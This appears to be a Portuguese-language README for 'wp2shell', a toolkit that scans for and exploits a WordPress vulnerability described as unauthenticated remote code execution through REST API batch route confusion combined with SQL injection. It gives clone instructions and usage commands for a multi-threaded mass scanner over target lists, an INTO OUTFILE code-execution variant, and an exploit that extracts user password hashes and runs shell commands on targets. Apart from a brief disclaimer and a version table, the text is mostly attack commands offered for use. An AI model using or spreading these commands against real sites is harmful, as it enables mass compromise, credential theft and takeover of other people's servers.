
wp2shell - WordPress CVE-2026-63030 Exploit & Scanner
⚡ Scanner e Exploit de Vulnerabilidade em Tempo Real e Rápido para CVE-2026-63030 (wp2shell)
wp2shell é um kit de ferramentas abrangente para detectar e explorar CVE-2026-63030, uma vulnerabilidade crítica no WordPress que permite que atacantes não autenticados executem código remoto através de confusão de rota batch da API REST combinada com injeção de SQL.
CVE-2026-63030 (wp2shell) é uma vulnerabilidade crítica descoberta por Adam Kues (Assetnote / Searchlight Cyber) que afeta o núcleo do WordPress. Ela combina dois bugs:
author__not_in# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell
# No dependencies required - uses Python standard library only!
# Python 3.7+ required
Scanner em tempo real multi-thread para detecção de vulnerabilidades em larga escala.
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt
# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test
# JSON output
python wp2shell_scanner.py -f list.txt -j
Demonstra a variante RCE INTO OUTFILE (requer privilégio FILE do MySQL).
# Single target
python3 wp2shell_intooutfile.py https://target.com
# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10
Versão portátil e de arquivo único do exploit com funcionalidade completa.
# Check vulnerability
python wp2shell-exploit.py check https://target.com
# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users
# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint
# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"
IMPORTANTE: Esta ferramenta é apenas para fins educacionais e de teste autorizado.
| Faixa de Versão | Impacto | Status |
|---|
| 6.9.0 - 6.9.4 | 🔴 RCE (Crítico) | ❌ Vulnerável |
| 7.0.0 - 7.0.1 | 🔴 RCE (Crítico) | ❌ Vulnerável |
| 6.8.0 - 6.8.5 | 🟡 SQLi (Alto) | ❌ Vulnerável |
| 6.9.5+ / 7.0.2+ | ✅ Corrigido | ✅ Seguro |